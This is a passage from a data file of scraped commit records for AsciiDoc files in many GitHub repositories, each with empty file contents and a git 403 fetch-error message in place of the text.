commit\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"eecd337a69a70df6f3924f9b5023383b0d89ab8b","subject":"added introduction","message":"added introduction\n","repos":"oss-ethinking\/amajza","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oss-ethinking\/amajza.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfa4bf7972dac7868a5d5cf6c24a8ebe3a35ab04","subject":"y2b create post Sony PS3 Wireless Stereo Headset Unboxing (Playstation 3)","message":"y2b create post Sony PS3 Wireless Stereo Headset Unboxing (Playstation 3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-19-Sony-PS3-Wireless-Stereo-Headset-Unboxing-Playstation-3.adoc","new_file":"_posts\/2011-09-19-Sony-PS3-Wireless-Stereo-Headset-Unboxing-Playstation-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07ff722e92109923fb283d079a747be6db6e9187","subject":"Update 2016-05-17-Episode-57-Dnyeahh-I-speak-good-or-Sharks-with-Flippers.adoc","message":"Update 2016-05-17-Episode-57-Dnyeahh-I-speak-good-or-Sharks-with-Flippers.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-05-17-Episode-57-Dnyeahh-I-speak-good-or-Sharks-with-Flippers.adoc","new_file":"_posts\/2016-05-17-Episode-57-Dnyeahh-I-speak-good-or-Sharks-with-Flippers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e65abcdf8f23f9d156fccc616619548b528b9e8","subject":"Fix comment for item 2 of dir traversal","message":"Fix comment for item 2 of dir traversal\n\nEdited comment for item 2 of dir traversal example to correspond to the cited code which refers to 'bin' folder rather than 'dir' one\n","repos":"guangying945\/incubator-groovy,tkruse\/incubator-groovy,eginez\/incubator-groovy,genqiang\/incubator-groovy,eginez\/incubator-groovy,graemerocher\/incubator-groovy,tkruse\/incubator-groovy,samanalysis\/incubator-groovy,ebourg\/incubator-groovy,paplorinc\/incubator-groovy,yukangguo\/incubator-groovy,fpavageau\/groovy,apache\/incubator-groovy,upadhyayap\/incubator-groovy,nobeans\/incubator-groovy,PascalSchumacher\/incubator-groovy,traneHead\/groovy-core,i55ac\/incubator-groovy,graemerocher\/incubator-groovy,pledbrook\/incubator-groovy,taoguan\/incubator-groovy,nkhuyu\/incubator-groovy,shils\/groovy,russel\/groovy,russel\/groovy,upadhyayap\/incubator-groovy,eginez\/incubator-groovy,nobeans\/incubator-groovy,paplorinc\/incubator-groovy,shils\/incubator-groovy,kidaa\/incubator-groovy,fpavageau\/groovy,kidaa\/incubator-groovy,nobeans\/incubator-groovy,guangying945\/incubator-groovy,paulk-asert\/groovy,apache\/groovy,aaronzirbes\/incubator-groovy,alien11689\/incubator-groovy,graemerocher\/incubator-groovy,paplorinc\/incubator-groovy,taoguan\/incubator-groovy,bsideup\/incubator-groovy,dpolivaev\/groovy,EPadronU\/incubator-groovy,gillius\/incubator-groovy,adjohnson916\/incubator-groovy,ebourg\/incubator-groovy,pickypg\/incubator-groovy,jwagenleitner\/incubator-groovy,sagarsane\/incubator-groovy,apache\/incubator-groovy,aim-for-better\/incubator-groovy,armsargis\/groovy,yukangguo\/incubator-groovy,samanalysis\/incubator-groovy,dpolivaev\/groovy,taoguan\/incubator-groovy,EPadronU\/incubator-groovy,avafanasiev\/groovy,jwagenleitner\/incubator-groovy,fpavageau\/groovy,paulk-asert\/incubator-groovy,apache\/groovy,shils\/groovy,guangying945\/incubator-groovy,alien11689\/incubator-groovy,avafanasiev\/groovy,guangying945\/incubator-groovy,EPadronU\/incubator-groovy,ChanJLee\/incubator-groovy,jwagenleitner\/groovy,ChanJLee\/incubator-groovy,sagarsane\/incubator-groovy,bsideup\/groovy-core,paulk-asert\/incubator-groovy,nkhuyu\/incubator-groovy,i55ac\/incubator-groovy,PascalSchumacher\/incubator-groovy,i55ac\/incubator-groovy,ChanJLee\/incubator-groovy,eginez\/incubator-groovy,pickypg\/incubator-groovy,adjohnson916\/incubator-groovy,kidaa\/incubator-groovy,antoaravinth\/incubator-groovy,apache\/incubator-groovy,PascalSchumacher\/incubator-groovy,nkhuyu\/incubator-groovy,kenzanmedia\/incubator-groovy,i55ac\/incubator-groovy,bsideup\/groovy-core,paulk-asert\/groovy,bsideup\/groovy-core,antoaravinth\/incubator-groovy,paulk-asert\/incubator-groovy,samanalysis\/incubator-groovy,paulk-asert\/incubator-groovy,pickypg\/incubator-groovy,upadhyayap\/incubator-groovy,kenzanmedia\/incubator-groovy,shils\/incubator-groovy,traneHead\/groovy-core,rabbitcount\/incubator-groovy,yukangguo\/incubator-groovy,jwagenleitner\/groovy,EPadronU\/incubator-groovy,kidaa\/incubator-groovy,tkruse\/incubator-groovy,bsideup\/incubator-groovy,kenzanmedia\/incubator-groovy,russel\/groovy,graemerocher\/incubator-groovy,dpolivaev\/groovy,gillius\/incubator-groovy,alien11689\/incubator-groovy,antoaravinth\/incubator-groovy,nobeans\/incubator-groovy,jwagenleitner\/incubator-groovy,pledbrook\/incubator-groovy,russel\/groovy,pledbrook\/incubator-groovy,aim-for-better\/incubator-groovy,ChanJLee\/incubator-groovy,samanalysis\/incubator-groovy,aaronzirbes\/incubator-groovy,bsideup\/groovy-core,shils\/groovy,yukangguo\/incubator-groovy,shils\/incubator-groovy,ebourg\/incubator-groovy,aim-for-better\/incubator-groovy,taoguan\/incubator-groovy,jwagenleitner\/incubator-groovy,apache\/incubator-groovy,traneHead\/groovy-core,apache\/groovy,apache\/groovy,pledbrook\/incubator-groovy,pickypg\/incubator-groovy,sagarsane\/incubator-groovy,nkhuyu\/incubator-groovy,sagarsane\/incubator-groovy,adjohnson916\/incubator-groovy,paulk-asert\/groovy,PascalSchumacher\/incubator-groovy,gillius\/incubator-groovy,rabbitcount\/incubator-groovy,russel\/incubator-groovy,armsargis\/groovy,aaronzirbes\/incubator-groovy,adjohnson916\/incubator-groovy,ebourg\/incubator-groovy,avafanasiev\/groovy,armsargis\/groovy,gillius\/incubator-groovy,aaronzirbes\/incubator-groovy,armsargis\/groovy,paulk-asert\/incubator-groovy,bsideup\/incubator-groovy,rabbitcount\/incubator-groovy,paulk-asert\/groovy,kenzanmedia\/incubator-groovy,jwagenleitner\/groovy,genqiang\/incubator-groovy,fpavageau\/groovy,upadhyayap\/incubator-groovy,antoaravinth\/incubator-groovy,paplorinc\/incubator-groovy,russel\/incubator-groovy,genqiang\/incubator-groovy,shils\/groovy,dpolivaev\/groovy,genqiang\/incubator-groovy,avafanasiev\/groovy,bsideup\/incubator-groovy,alien11689\/incubator-groovy,traneHead\/groovy-core,jwagenleitner\/groovy,tkruse\/incubator-groovy,aim-for-better\/incubator-groovy,russel\/incubator-groovy,russel\/incubator-groovy,shils\/incubator-groovy,PascalSchumacher\/incubator-groovy,rabbitcount\/incubator-groovy","old_file":"src\/spec\/doc\/working-with-io.adoc","new_file":"src\/spec\/doc\/working-with-io.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kidaa\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6d8c89f446f4a9f77b4a1b5e98263977c532fef","subject":"y2b create post NVIDIA in your car? (Project Mercury - CES 2014)","message":"y2b create post NVIDIA in your car? (Project Mercury - CES 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-12-NVIDIA-in-your-car-Project-Mercury--CES-2014.adoc","new_file":"_posts\/2014-01-12-NVIDIA-in-your-car-Project-Mercury--CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34703e4f3f45b1ea71abd63ac1f0c0d3d70f224f","subject":"Renamed '_posts\/2019-02-10-RTFM-Episode-0x01.adoc' to '_posts\/2018-02-10-RTFM-Episode-0x01.adoc'","message":"Renamed '_posts\/2019-02-10-RTFM-Episode-0x01.adoc' to '_posts\/2018-02-10-RTFM-Episode-0x01.adoc'","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2018-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2018-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"666b38abd670b9c662a5b7220c3e17d4e0d60fb5","subject":"Update 2019-02-10-RTFM-Episode-0x01.adoc","message":"Update 2019-02-10-RTFM-Episode-0x01.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d5b0a5da16be7ad20a90fff0f448b7a0e3b00dd","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker\/curl-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker\/curl-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"048dbf5c441697e676d3e6d05a630b6cc5eeb4b4","subject":"Update 2016-03-28-Happy-Easter.adoc","message":"Update 2016-03-28-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"_posts\/2016-03-28-Happy-Easter.adoc","new_file":"_posts\/2016-03-28-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a092515d5fd9d1099c69a3b0a1bf66164b6e0e80","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0500b749ef98693bc2f5114c955b4d6e727a302d","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730485a25d757038699033385ec9e3343df58204","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f44297bfd251b2d77ba6d253f8a6fa147a3f58","subject":"Plan 13","message":"Plan 13\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb824a716ffefa59bc8ed0e9e15c28daee03a341","subject":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","message":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"392a3d1586024a012f23de412e55aace7a4ff612","subject":"job #12308 add implementation note","message":"job #12308 add implementation note\n","repos":"lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12308_parse_functions.int.adoc","new_file":"doc-bridgepoint\/notes\/12308_parse_functions.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95cefe95c1014ec7726a879c384beafb1a927e12","subject":"initial placeholder GEP for sealed classes","message":"initial placeholder GEP for sealed classes\n","repos":"keeganwitt\/groovy-website,keeganwitt\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-13.adoc","new_file":"site\/src\/site\/wiki\/GEP-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/keeganwitt\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7195e13f0de43dc9f3927b00c85b7740e31880fe","subject":"Rewrite unclear part in GridLayout documentation","message":"Rewrite unclear part in GridLayout documentation","repos":"mstahv\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework","old_file":"documentation\/layout\/layout-gridlayout.asciidoc","new_file":"documentation\/layout\/layout-gridlayout.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e09126c4fd7a7807dcfb064ab2be7431ff0de39e","subject":"updated to reflect #316","message":"updated to reflect #316","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain","old_file":"src\/docs\/manual\/03_task_exportJiraIssues.adoc","new_file":"src\/docs\/manual\/03_task_exportJiraIssues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81863cb47f8450d625067aff87cc29969c412093","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"582d7ba79722b97c95058852db12a58d958d2f90","subject":"Update 2015-12-28-Hola-Mundo.adoc","message":"Update 2015-12-28-Hola-Mundo.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2015-12-28-Hola-Mundo.adoc","new_file":"_posts\/2015-12-28-Hola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"354d6779b6d45ba8f7ef39e5f9c6ae2bacd81275","subject":"Deleted _posts\/2016-08-09.adoc","message":"Deleted _posts\/2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09.adoc","new_file":"_posts\/2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ffd4157a1d917313eac074dd06b9e2e324f83f8","subject":"Update 2016-04-08-First-Post.adoc","message":"Update 2016-04-08-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-First-Post.adoc","new_file":"_posts\/2016-04-08-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"299be3ae8a7f6bb5c8ad68877128d2198b75a449","subject":"Update 2016-08-23-First-Post.adoc","message":"Update 2016-08-23-First-Post.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2016-08-23-First-Post.adoc","new_file":"_posts\/2016-08-23-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2b4ebe83bcd0629175cd99260a03266b605fc44","subject":"Update 2016-07-29-TEST.adoc","message":"Update 2016-07-29-TEST.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-TEST.adoc","new_file":"_posts\/2016-07-29-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec585306734d4f478c6dd06d4df930e9117d5c37","subject":"Update 2016-10-27-Demo.adoc","message":"Update 2016-10-27-Demo.adoc","repos":"ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog","old_file":"_posts\/2016-10-27-Demo.adoc","new_file":"_posts\/2016-10-27-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ruaqiwei23\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3934ab6699d6edd85e9ca3a2b98c9a3972113400","subject":"JDK 17","message":"JDK 17\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4edfd5033894d23a382c80f11c4e715ad21560c","subject":"Update 2004-04-04-Catatan-Istilah-Istilah-pada-Sistem-Komputer.adoc","message":"Update 2004-04-04-Catatan-Istilah-Istilah-pada-Sistem-Komputer.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2004-04-04-Catatan-Istilah-Istilah-pada-Sistem-Komputer.adoc","new_file":"_posts\/2004-04-04-Catatan-Istilah-Istilah-pada-Sistem-Komputer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca6a7fbe770e7eb63c7887468f611ec5e71d459","subject":"Mid-2021 release (#383)","message":"Mid-2021 release (#383)\n\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2021-05-24-release.adoc","new_file":"content\/news\/2021-05-24-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"110b17f9d0125a1e1c2bb775c05679b9520b031a","subject":"Update 2016-01-27-Puzzle-5-e-ticket.adoc","message":"Update 2016-01-27-Puzzle-5-e-ticket.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-27-Puzzle-5-e-ticket.adoc","new_file":"_posts\/2016-01-27-Puzzle-5-e-ticket.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31837daf26468060878c20ac7eb600883f59d09e","subject":"y2b create post Gadget Graveyard (Update!)","message":"y2b create post Gadget Graveyard (Update!)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-05-14-Gadget-Graveyard-Update.adoc","new_file":"_posts\/2011-05-14-Gadget-Graveyard-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5881f9a947510fc003400a90eb69976e53b76f7","subject":"Update 2016-10-18-Vertx-and-Blocking-Code.adoc","message":"Update 2016-10-18-Vertx-and-Blocking-Code.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-10-18-Vertx-and-Blocking-Code.adoc","new_file":"_posts\/2016-10-18-Vertx-and-Blocking-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd293561712ce9b8474e432dd32ed102f1fc0fe7","subject":"Update 2019-06-31-Kafka-integration-tests.adoc","message":"Update 2019-06-31-Kafka-integration-tests.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2019-06-31-Kafka-integration-tests.adoc","new_file":"_posts\/2019-06-31-Kafka-integration-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef6d06fcb548eca1cfcc85d8fffb8a598696d9c8","subject":"- user documentation","message":"- user documentation\n","repos":"buschmais\/extended-objects,SMB-TEC\/extended-objects","old_file":"doc\/src\/main\/asciidoc\/index.asciidoc","new_file":"doc\/src\/main\/asciidoc\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SMB-TEC\/extended-objects.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1db2da1e3cde3b2afe92c40dbadf1c9939e47f1d","subject":"Clarify combined functor's type","message":"Clarify combined functor's type\n","repos":"OlegTheCat\/cats,mccraigmccraig\/cats,yurrriq\/cats,funcool\/cats,alesguzik\/cats,tcsavage\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0a26b064eac25a4126d73648751aeb3c272a0f77","subject":"update","message":"update\n","repos":"tomoya92\/tomoya92.github.io,tomoya92\/tomoya92.github.io,tomoya92\/tomoya92.github.io","old_file":"_posts\/2017-04-25-demo.adoc","new_file":"_posts\/2017-04-25-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomoya92\/tomoya92.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c877a67a278f52e23492b01b90939f180158c1e","subject":"Fix cache sample README","message":"Fix cache sample README\n\nCloses gh-5807\n","repos":"shakuzen\/spring-boot,philwebb\/spring-boot-concourse,eddumelendez\/spring-boot,kamilszymanski\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,mbenson\/spring-boot,RichardCSantana\/spring-boot,bbrouwer\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot-concourse,nebhale\/spring-boot,shakuzen\/spring-boot,jvz\/spring-boot,jvz\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,RichardCSantana\/spring-boot,Nowheresly\/spring-boot,jvz\/spring-boot,akmaharshi\/jenkins,Buzzardo\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,mosoft521\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,jxblum\/spring-boot,ilayaperumalg\/spring-boot,javyzheng\/spring-boot,sebastiankirsch\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,DeezCashews\/spring-boot,tiarebalbi\/spring-boot,nebhale\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,javyzheng\/spring-boot,philwebb\/spring-boot-concourse,jbovet\/spring-boot,eddumelendez\/spring-boot,felipeg48\/spring-boot,mosoft521\/spring-boot,vpavic\/spring-boot,joshthornhill\/spring-boot,bclozel\/spring-boot,royclarkson\/spring-boot,akmaharshi\/jenkins,wilkinsona\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,ollie314\/spring-boot,bbrouwer\/spring-boot,afroje-r